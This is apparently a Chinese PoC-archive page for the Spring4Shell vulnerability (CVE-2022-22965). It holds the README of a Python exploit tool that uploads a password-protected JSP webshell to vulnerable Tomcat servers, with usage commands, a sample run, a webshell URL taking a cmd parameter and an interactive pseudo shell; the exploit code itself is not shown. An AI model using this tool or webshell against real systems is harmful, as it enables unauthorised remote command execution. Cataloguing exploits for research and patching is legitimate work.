关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
spring4shell | CVE-2022-22965
介绍
# spring4shell ⭐
a python implementation of CVE-2022-22965 that provides a prompt to the user in the style of an ssh session.
the script is designed to be easy to understand and execute, with both readability and accessbility - depending on the user's choice. Designed for exploiting the vulnerability on tomcat servers. The fileDateFormat field on the server will be set and unset as part of the script which allows the exploit to be run multiple times. Cleanup may be required.
## the exploit - CVE-2022-22965 ❗
vulnerability found in
the java spring framework before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19 and running on a version of the Java Development Kit greater than or equal to 9.
More info:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
## prerequisites ✔
requests module and BeautifulSoup module are required for the exploit to run. these can be installed with:
`pip3 install bs4`
`pip3 install requests`
all other modules are built into python3.
## usage ℹ
the script only requires the url of vulnerable server to run. however there are other flags for ease of access, etc.
output of --help:
```
usage: spring4shell_v3.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] [-a] [-n] address
spring4shell_v3.py exploits an RCE vulnerability in
applications running spring core java framework.
positional arguments:
address ip/hostname, port, sub-directories to the vulnerable spring core framework on tomcat
optional arguments:
-h, --help show this help message and exit
-f FILENAME, --filename FILENAME
name of the file to create and upload
-p PASSWORD, --password PASSWORD
password to protect the uploaded shell
-d DIRECTORY, --directory DIRECTORY
The upload path for the file
-a, --accessible turns off features which may negatively affect screen readers
-n, --no-colour removes colour output
example:
spring4shell_v3.py http://10.10.10.10/
spring4shell_v3.py http://hostname:8080/ -p 'password123'
spring4shell_v3.py http://10.10.10.10/subdir/ -a -f 'jsp-shell'
```
***
example output:
```
./spring4shell http://spring-vuln.local
/ / | / / /
___ ___ ___ ___ ___ (___| ___ (___ ___ ( (
|___ | )| )| | )| ) )|___ | )|___)| |
__/ |__/ | | | / |__/ / __/ | / |__ | |
| __/
CVE-2022-22965.
[i] attempting to change tomcat log variables.
[+] log variables set successfully.
[+] attempting to change tomcat log location variables.
[+] log successfully modified.
[i] waiting for tomcat changes.
[i] sending the webshell.
[i] resetting the log variables.
[i] shell location:
[i] http://spring-vuln.local/20df2b10c787d5ae.jsp?pwd=bd72c5e8&cmd=whoami
[i] or run commands here. type 'exit' to quit.
spring4shell:service@spring-vuln.local $ whoami
service
spring4shell:service@spring-vuln.local $
```
## limitations ⚠
it goes without saying that the script does not provide the user with a full shell, but designed as a platform for achieving a full reverse shell, privesc, etc, on the target.
The script attempts to harvest the user/service running the vulnerable server so that it can be used as part of the pseudo command prompt in the program, though this is not always reliable.
## notes 📝
the script was mainly an exercise in python scripting for a single exploit with both readability and accessibility in mind. designed for ease of use and understandability. attempts to handle common exceptions.
## credits 👍
https://skerritt.blog/a11y/ - accessibility implementation.
文件快照
[4.0K] /data/pocs/1a0eff64ce98b20ac40931135dede9df247354ca
├── [3.9K] README.md
└── [ 10K] spring4shell
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。